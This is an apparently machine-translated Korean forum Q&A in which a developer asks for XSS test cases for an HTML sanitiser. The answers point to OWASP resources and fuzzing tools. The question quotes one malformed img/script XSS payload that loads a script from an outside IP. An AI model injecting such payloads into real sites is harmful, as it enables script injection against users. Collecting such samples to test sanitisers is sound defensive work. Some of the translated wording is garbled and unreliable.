XSS 고문 테스트 - 존재합니까?

Question

나는 HTML Sanitiser를 쓰려고하고 있으며, 그것이 제대로 작동한다는 것을 테스트/증명하려면 분명히 그것이 어떻게 작동하는지 확인하기 위해 XSS 예제 세트가 필요합니다. 여기에 있습니다 코딩 공포의 좋은 예

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

나는 있다는 것을 안다 마임 고문 테스트 마임 디코더를 테스트하는 데 사용되는 첨부 파일이있는 여러 중첩 이메일로 구성됩니다 (제대로 해독 할 수 있다면 작동하는 것으로 입증되었습니다). 나는 기본적으로 XSS에 대한 명백한 것을 찾고 있습니다. 즉, 정상으로 작동하는지 확인하기 위해 소아 살염에 던질 수있는 dodgy html의 예 목록을 찾고 있습니다.

누군가가 소아 살염을 쓰는 방법에 대한 좋은 자원이 있다면 (즉, 사람들이 사용하려고하는 일반적인 착취가 시도하는 것 등) 그들은 감사하게받을 것입니다.

미리 감사드립니다 :-)

편집 : 이전에 명확하지 않은 경우 죄송합니다. 그러나 나는 고문 테스트 세트를 마친 후에도 소독자에 대한 단위 테스트를 작성하고 브라우저에서 테스트하지 않을 수 있습니다. 이론의 소스 데이터는 어디서나 왔을 수 있습니다. 브라우저만이 아닙니다.

Answer 1

이 XSS 치트 목록을 살펴보십시오. https://www.owasp.org/index.php/xss_filter_evasion_cheat_sheet

Answer 2

xss me 소독제에 대해 실행할 수있는 훌륭한 Firefox 플러그인입니다.

Answer 3

체크 아웃 OWASP. 그들은 XSS의 작동 방식, 무엇을 찾아야하는지, 심지어 webgoat 취약한 사이트에서 손을 시험해 볼 수있는 프로젝트.

Answer 4

Jesse Ruderman의 jsfunfuzz를 사용해 볼 수 있습니다.http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/) javaScript에서 임의의 데이터를 끊으려고 무작위 데이터를 던지는 것입니다. Firefox 팀이 이것을 큰 성공으로 사용한 것 같습니다.